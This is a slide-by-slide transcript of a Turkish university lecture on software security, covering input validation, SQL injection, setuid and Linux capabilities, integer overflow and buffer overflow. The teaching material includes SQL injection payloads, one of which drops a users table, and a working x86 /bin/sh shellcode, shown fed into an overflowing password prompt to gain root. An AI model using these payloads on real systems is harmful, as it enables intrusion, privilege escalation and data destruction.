Yazılım Güvenliği ve Güvenlik Açıkları. Ozan Çağlayan, Araştırma Görevlisi Galatasaray Üniversitesi, Bilgisayar Mühendisliği

Transkript

1 Yazılım Güvenliği ve Güvenlik Açıkları Ozan Çağlayan, Araştırma Görevlisi Galatasaray Üniversitesi, Bilgisayar Mühendisliği

2 Bilgisayar Güvenliği Nedir? Bilgisayar sistemlerinin, bilginin veya hizmetlerin istenmeyen veya yetkilendirilmemiş erişimden, değişimden veya yıkımdan korunmasıdır.

3 Geçersiz Kullanıcı Girişi - I Güvenli bir tasarım kullanıcı girdisine asla güvenmemelidir!

4 Geçersiz Kullanıcı Girişi - I Güvenli bir tasarım kullanıcı girdisine asla güvenmemelidir! int main(int argc, char *argv) { char buffer[100]; printf( Adınızı girin\n ); gets(buffer); printf( Merhaba ); printf(buffer); printf( \n ); return 0; }

5 Geçersiz Kullanıcı Girişi - I Güvenli bir tasarım kullanıcı girdisine asla güvenmemelidir! int main(int argc, char *argv) { char buffer[100]; printf( Adınızı girin\n ); gets(buffer); printf( Merhaba ); printf(buffer); printf( \n ); return 0; }

6 Belgeleri Okuyun! gets(char *s) reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0'). No check for buffer overrun is performed.

7 Belgeleri Okuyun! gets(char *s) reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0'). No check for buffer overrun is performed. Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead!

8 Geçersiz Kullanıcı Girişi - II Tasarım olarak güvenli bir sistem kullanıcı girişini mutlaka doğrulamalıdır!

9 Geçersiz Kullanıcı Girişi - II Tasarım olarak güvenli bir sistem kullanıcı girişini mutlaka doğrulamalıdır!

10 Geçersiz Kullanıcı Girişi - II Tasarım olarak güvenli bir sistem kullanıcı girişini mutlaka doğrulamalıdır!

11 Geçersiz Kullanıcı Girişi - II Tasarım olarak güvenli bir sistem kullanıcı girişini mutlaka doğrulamalıdır!

12 Geçersiz Kullanıcı Girişi - II Tasarım olarak güvenli bir sistem kullanıcı girişini mutlaka doğrulamalıdır!

13 Geçersiz Kullanıcı Girişi III SQL Injection Tasarım olarak güvenli bir sistem kullanıcı girişini mutlaka doğrulamalıdır!

14 Geçersiz Kullanıcı Girişi III SQL Injection Tasarım olarak güvenli bir sistem kullanıcı girişini mutlaka doğrulamalıdır! query = SELECT * FROM users WHERE = ' + + '; ozan@gmail.com // query: SELECT * FROM users WHERE = 'ozan@gmail.com'; execute_query(query);

15 Geçersiz Kullanıcı Girişi III SQL Injection Tasarım olarak güvenli bir sistem kullanıcı girişini mutlaka doğrulamalıdır! query = SELECT * FROM users WHERE = ' + + '; ' OR '1'='1 // query: SELECT * FROM users WHERE = '' OR '1'='1'; execute_query(query);

16 Geçersiz Kullanıcı Girişi III SQL Injection Tasarım olarak güvenli bir sistem kullanıcı girişini mutlaka doğrulamalıdır! query = SELECT * FROM users WHERE = ' + + '; a';drop TABLE users; SELECT * FROM userinfo WHERE 't' = 't // query: SELECT * FROM users WHERE = 'a';drop TABLE users; SELECT * FROM userinfo WHERE 't' = 't'; execute_query(query);

17 Geçersiz Kullanıcı Girişi III SQL Injection

18 Geçersiz Kullanıcı Girişi III SQL Injection

19 Geçersiz Kullanıcı Girişi III SQL Injection

20 Geçersiz Kullanıcı Girişi III SQL Injection

21 Geçersiz Kullanıcı Girişi III SQL Injection

22 En az ayrıcalık Prensibi Principle of Least Privilege Bir bilgisayar sisteminde her bileşen (kullanıcı, uygulama, ağ hizmeti, vb.) sadece ihtiyacı olan bilgi ve özkaynaklara erişebilmelidir:

23 En az ayrıcalık Prensibi Principle of Least Privilege Bir bilgisayar sisteminde her bileşen (kullanıcı, uygulama, ağ hizmeti, vb.) sadece ihtiyacı olan bilgi ve özkaynaklara erişebilmelidir: Yedekleme kullanıcısının sadece yedekleme ile ilgili uygulamaları çalıştırabilmesi, örneğin sisteme yazılım yükleyememesi.

24 root/superuser Unix ve türevi sistemlerde geleneksel olarak ayrıcalıklı (superuser/root) ve sıradan kullanıcılar mevcuttur:

25 root/superuser Unix ve türevi sistemlerde geleneksel olarak ayrıcalıklı (superuser/root) ve sıradan kullanıcılar mevcuttur: Sıradan kullanıcı Sadece kendi dosyalarına tam erişim hakkı vardır, Sistem dosyalarını ve diğer dosyaları değiştiremez, $ id uid=1000(ozan) 'root' kullanıcı Tüm dosyalara 'tam' erişimi vardır, Açılış parametrelerini değiştirebilir, Kısacası 'tüm' haklara sahiptir. # id uid=0(root)

26 root/superuser Unix ve türevi sistemlerde geleneksel olarak ayrıcalıklı (superuser/root) ve sıradan kullanıcılar mevcuttur: Sıradan kullanıcı Sadece kendi dosyalarına tam erişim hakkı vardır, 'root' kullanıcı su/sudo Sistem dosyalarını ve diğer dosyaları değiştiremez, $ id uid=1000(ozan) Tüm dosyalara 'tam' erişimi vardır, Açılış parametrelerini değiştirebilir, Kısacası 'tüm' haklara sahiptir. # id uid=0(root)

27 Parola değiştirme Sıradan bir kullanıcı parolasını değiştirmek istediğinde passwd komutunu kullanır:

28 Parola değiştirme Sıradan bir kullanıcı parolasını değiştirmek istediğinde passwd komutunu kullanır: $ passwd Changing password for user ozan. Changing password for ozan. (current) UNIX password: ***** New password: ***** Retype new password: ***** Password successfully changed.

29 Parola değiştirme Sıradan bir kullanıcı parolasını değiştirmek istediğinde passwd komutunu kullanır: $ passwd Changing password for user ozan. Changing password for ozan. (current) UNIX password: ***** New password: ***** Retype new password: ***** Password successfully changed. Parolanın değiştirilmesi ilgili sistem dosyasındaki parola bilgisinin değiştirilmesi demektir. Sıradan kullanıcının sistem dosyalarına yazma yetkisi yoksa nasıl parolasını değiştirebiliyor?

30 setuid() setuid biti 1 olan çalıştırılabilir dosyalar, çalıştırıldıklarında daha yüksek haklara erişip (örn. root) o haklarla çalışırlar:

31 setuid() setuid biti 1 olan çalıştırılabilir dosyalar, çalıştırıldıklarında daha yüksek haklara erişip (örn. root) o haklarla çalışırlar: $ ls /usr/bin/{passwd,firefox,su} -rwxr-xr-x 1 root root 6,9K Ara 1 00:15 /usr/bin/firefox -rwsr-xr-x 1 root root 40K Ara 11 14:03 /usr/bin/su -rwsr-xr-x 1 root root 28K Ara 4 19:27 /usr/bin/passwd

32 setuid() setuid biti 1 olan çalıştırılabilir dosyalar, çalıştırıldıklarında daha yüksek haklara erişip (örn. root) o haklarla çalışırlar: $ ls /usr/bin/{passwd,firefox,su} -rwxr-xr-x 1 root root 6,9K Ara 1 00:15 /usr/bin/firefox -rwsr-xr-x 1 root root 40K Ara 11 14:03 /usr/bin/su -rwsr-xr-x 1 root root 28K Ara 4 19:27 /usr/bin/passwd setuid biti etkin

33 setuid() setuid bitini etkin olarak tanımlayan yazılımlar oldukça dikkatli geliştirilmelidir, Bu yazılımlardaki güvenlik açıklarından yararlanılarak sıradan kullanıcıların root hakları elde etmesi (privilege escalation) kaçınılmazdır.

34 Vaka I - Android 'adb' Açığı

35 Vaka I - Android 'adb' Açığı

36 Vaka I - Android 'adb' Açığı

37 Vaka I - Android 'adb' Açığı

38 Vaka I - Android 'adb' Açığı

39 Vaka I - Android 'adb' Açığı

40 Vaka I - Android 'adb' Açığı

41 Vaka I - Android 'adb' Açığı root!

42 Çözüm - Android 'adb' Açığı Fix bug Check return values. diff --git a/adb/adb.c b/adb/adb.c index 95dc001..d9f96df a/adb/adb.c +++ b/adb/adb.c /* then switch user and group to "shell" */ setgid(aid_shell); setuid(aid_shell); if (setgid(aid_shell)!= 0) { exit(1); } if (setuid(aid_shell)!= 0) { exit(1); } /* set CAP_SYS_BOOT capability, so "adb reboot" will succeed */ header.version = _LINUX_CAPABILITY_VERSION;...

43 Çözüm - Android 'adb' Açığı Fix bug Check return values. diff --git a/adb/adb.c b/adb/adb.c index 95dc001..d9f96df a/adb/adb.c +++ b/adb/adb.c /* then switch user and group to "shell" */ setgid(aid_shell); setuid(aid_shell); if (setgid(aid_shell)!= 0) { Çözüm sadece fonksiyonların exit(1); dönüş değerlerini kontrol } if (setuid(aid_shell)!= 0) { etmekten geçiyor. exit(1); } /* set CAP_SYS_BOOT capability, so "adb reboot" will succeed */ header.version = _LINUX_CAPABILITY_VERSION;...

44 Vaka II - Traceroute SuSE: local root vulnerability in traceroute Traceroute is a tool that can be used to track packets in a TCP/IP network to determine its route or to find out about not working routers. Traceroute requires root privilege to open a raw socket. This allows a malicious user to gain root access by exploiting a buffer overflow at a later point.

45 Çözüm? Traceroute aracının gerçekten root yetkilerinin tamamına ihtiyacı var mıdır?

46 Çözüm: Yeterlikler Capabilities Her türlü yetkiye sahip olan ayrıcalıklı süreçlerin (root) ayrıcalıklarının ufak ve bağımsız birimlere bölünmesi:

47 Çözüm: Yeterlikler Capabilities Her türlü yetkiye sahip olan ayrıcalıklı süreçlerin (root) ayrıcalıklarının ufak ve bağımsız birimlere bölünmesi: CAP_SYS_BOOT: CAP_SYS_TIME: CAP_NET_ADMIN: CAP_NET_RAW:... Baştan başlatma Zamanı ayarlama Ağ yönetimi Ham soket açma

48 Çözüm: Yeterlikler Capabilities SuSE: local root vulnerability in traceroute-nanog/nkitb Traceroute is a tool that can be used to track packets in a TCP/IP network to determine its route or to find out about not working routers. Traceroute requires root privilege to open a raw socket. This allows a malicious user to gain root access by exploiting a buffer overflow at a later point.

49 Çözüm: Yeterlikler Capabilities SuSE: local root vulnerability in traceroute-nanog/nkitb Traceroute is a tool that can be used to track packets in a TCP/IP network to determine its route or to find out about not working routers. Traceroute CAP_NET_RAW requires root privilege to open a raw socket. This Yeterliği allowskullanıldı a malicious user to gain root access by exploiting a buffer overflow at a later point. Starting with 8.1, SuSE Linux contains a traceroute program rewritten by Olaf Kirch that does not require root privileges anymore. This version of traceroute is not vulnerable.

50 İzinler (Android Yeterlikleri) Permissions (aka. Capabilities in Android) Basit bir Android uygulaması öntanımlı olarak hiçbir izne sahip değildir. Her uygulama ihtiyacı olan izinleri önceden belirtmelidir: <manifest xmlns:android="..." package="com.android.app.myapp" > <uses-permission android:name="android.permission.receive_sms" />...

51 İzinler (Android Yeterlikleri) Permissions (aka. Capabilities in Android)

52 Neden Güvensiz Kod Yazarız?

53 Neden Güvensiz Kod Yazarız? Çoğu müfredat bilgisayar güvenliğini içermez, içerse de genellikle kriptografi ve ağ protokolleri ile kısıtlıdır,

54 Neden Güvensiz Kod Yazarız? Çoğu müfredat bilgisayar güvenliğini içermez, içerse de genellikle kriptografi ve ağ protokolleri ile kısıtlıdır, Programcılar insandır ve insanlar tembeldir, bu sebepten programcılar kolay yolu güvenli yola tercih edeceklerdir,

55 Neden Güvensiz Kod Yazarız? Çoğu müfredat bilgisayar güvenliğini içermez, içerse de genellikle kriptografi ve ağ protokolleri ile kısıtlıdır, Programcılar insandır ve insanlar tembeldir, bu sebepten programcılar kolay yolu güvenli yola tercih edeceklerdir, Çoğu programcı özetle iyi programcı değildir,...

56 Popüler 10 Güvenli Kodlama Tekniği Girdileri denetle, Derleyici uyarılarını dikkate al, Güvenlik politikalarını dikkate alan bir yazılım mimarisi oluştur, Basit düşün, Öntanımlı reddet, En az ayrıcalık prensibine sadık kal, Diğer sistemlere yolladığın verileri iyileştir (sanitization), Derinliğine-güvenlik (defense in depth), Kalite denetimi & Test, Kullandığın dile göre güvenli bir kodlama standardı seç.

57 Top 10 Güvenli Kodlama Güvenlik uzmanları ve üstadlar Teknikleri (Hacker) etrafından dolanmak deyiminin hakkını veren insanlardır.

58 Güvenlikte Açık-kaynak Modeli Güvenliğe dair her şeyde açık-kaynaklı kod tercih edin. Bruce Schneier Amerikalı şifreleme ve bilgisayar güvenliği uzmanı

59 Güvenlikte Açık-kaynak Modeli Çok daha fazla insanın kodunuzu incelediği gerçeği bir yana, model temiz kod yazmanızı ve standartlara uymanızı zorluyor. Vincent Rijmen AES geliştiricisi

60 Güvenlikte Açık-kaynak Modeli Bilgisayar yazılımlarında güvenliği sağlamak için gizliliğe bağımlı olmak basitçe gerçek dışıdır. Yazılımınızın çalışma prensiplerini genel dolaşımdan sakınabilirsiniz ama ciddi rakiplerinizin yazılımınızı reverse-engineer etmelerini engelleyebilir misiniz? Büyük ihtimalle hayır. Whitfield Diffie Açık-anahtarlı şifrelemenin mucidi

61 Yazılım Hataları & Güvenlik Açıkları

62 Tamsayı Taşması Çeşitli veri boyutlarının alabilecekleri en büyük işaretsiz değerler: 8 bit: 28 1= bit: 216 1= 65,535 32bit: 232 1= 4,294,967,295 64bit: 264 1= 18,446,744,073,709,551,615

63 Tamsayı Taşması int main(int argc, char *argv) { // Each customer starts with 100$ unsigned int debit = 100; show_card_debit(debit); // 90$ transaction for amazon payment debit = debit - 90; show_card_debit(debit); Çıktı ----// 16$ transaction for Akbil :) Debit: 100 debit = debit - 16; Debit: 10 show_card_debit(debit); Debit: return 0; }

64 Tamsayı Taşması

65 Tamsayı Taşması = 4,294,967,290

66 Yerel Hizmet Reddi Local Denial of Service Bir güvenlik açığından faydalanan kötü niyetli bir kullanıcının sistemin: Çökmesini, Çok yüksek bellek kullanım oranına erişmesini, Çok yüksek CPU kullanım oranına erişmesini, sağlamasıdır.

67 Yerel Hizmet Reddi Local Denial of Service

68 Yerel Hizmet Reddi Local Denial of Service Reading TCP stats when using TCP Illinois congestion control algorithm can cause a divide by zero kernel oops. Steps to Reproduce: Monitor internal TCP information via command "ss -i" 2. Establish new TCP connection to machine

69 Yerel Hizmet Reddi Local Denial of Service --- a/net/ipv4/tcp_illinois.c +++ b/net/ipv4/tcp_illinois.c -313, ,13 static void tcp_illinois_info(struct sock *sk,.tcpv_rttcnt = ca->cnt_rtt,.tcpv_minrtt = ca->base_rtt, }; do_div(t, info.tcpv_rttcnt); info.tcpv_rtt = t; if (info.tcpv_rttcnt > 0) { do_div(t, info.tcpv_rttcnt); info.tcpv_rtt = t; }...

70 Tampon Taşması Buffer Overflow

71 Tampon Taşması Buffer Overflow char shellcode[] = { "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68" }; void test_shellcode(int dummy) { char **ptr = (char **)&dummy; // Point to saved IP ptr = ptr - 1; *ptr = shellcode; } int main() { test_shellcode(112); return 0; }

72 Tampon Taşması Buffer Overflow char shellcode[] = { "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68" }; void test_shellcode(int dummy) { char **ptr = (char **)&dummy; // Point to saved IP ptr = ptr - 1; *ptr = shellcode; } int main() { test_shellcode(112); return 0; } dummy = 112 Dönüş adresi ptr ptr - 1

73 Tampon Taşması Buffer Overflow char shellcode[] = { "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68" }; void test_shellcode(int dummy) { char **ptr = (char **)&dummy; // Point to saved IP ptr = ptr - 1; *ptr = shellcode; } int main() { test_shellcode(112); return 0; } dummy = 112 Dönüş adresi ptr ptr - 1

74 Tampon Taşması Buffer Overflow char shellcode[] = { "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68" }; void test_shellcode(int dummy) { char **ptr = (char **)&dummy; // Point to saved IP ptr = ptr - 1; *ptr = shellcode; } int main() { test_shellcode(112); return 0; } dummy = 112 Dönüş adresi ptr ptr - 1

75 Tampon Taşması Buffer Overflow char shellcode[] = { int main() { "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" char *args[] = {"/bin/sh", NULL}; "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" execve(args[0], args, NULL); "\x6e\x2f\x73\x68" return 0; }; } void test_shellcode(int dummy) { char **ptr = (char **)&dummy; // Point to saved IP ptr = ptr - 1; *ptr = shellcode; } int main() { test_shellcode(112); return 0; } dummy = 112 Dönüş adresi ptr ptr - 1

76 Tampon Taşması Buffer Overflow char shellcode[] = { $ gcc example.c -o example "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" $./example "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" bash 4.2 "\x6e\x2f\x73\x68" $ }; void test_shellcode(int dummy) { char **ptr = (char **)&dummy; // Point to saved IP ptr = ptr - 1; *ptr = shellcode; } int main() { test_shellcode(112); return 0; } dummy = 112 Dönüş adresi ptr ptr - 1

77 Tampon Taşması Buffer Overflow char shellcode[] = { $ hexdump -C example "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68" }; void test_shellcode(int dummy) { char **ptr = (char **)&dummy; // Point to saved IP ptr = ptr - 1; *ptr = shellcode; } int main() { test_shellcode(112); return 0; } dummy = 112 Dönüş adresi ptr ptr - 1

78 Tampon Taşması Buffer Overflow char shellcode[] = { $ hexdump -C example 7f 45 4c "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" e 00 kodu "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" Makine a "\x6e\x2f\x73\x68" }; void test_shellcode(int dummy) { char **ptr = (char **)&dummy; // Point to saved IP ptr = ptr - 1; *ptr = shellcode; } int main() { test_shellcode(112); return 0; } dummy = 112 Dönüş adresi ptr ptr - 1

79 Tampon Taşması Buffer Overflow int main(int argc, char *argv) { char buffer[100]; printf( Enter current password ); gets(buffer);... $ passwd Enter current password:password (100 karakteri doldur) \xeb\x16\x5e\x31\xd2\x52\x56\x89 \xe1\x89\xf3\x31\xc0\xb0\x0b\xcd \x80\x31\xdb\x31\xc0\x40\xcd\x80 \xe8\xe5\xff\xff\xff\x2f\x62\x69 \x6e\x2f\x73\x68 [Enter] # # id uid=0(root)

80 Tampon Taşması Koruması Buffer Overflow Protection char shellcode[] = { $ hexdump -C example 7f 45 4c "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" e 00 kodu "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" Makine a "\x6e\x2f\x73\x68" }; void test_shellcode(int dummy) { char **ptr = (char **)&dummy; // Point to saved IP ptr = ptr - 1; *ptr = shellcode; } int main() { test_shellcode(112); return 0; Canary ezilmiş mi? } Dummy = 112 Canary Dönüş adresi ptr ptr - 2

81 Teşekkürler! Ozan Çağlayan, Araştırma Görevlisi Galatasaray Üniversitesi, Bilgisayar Mühendisliği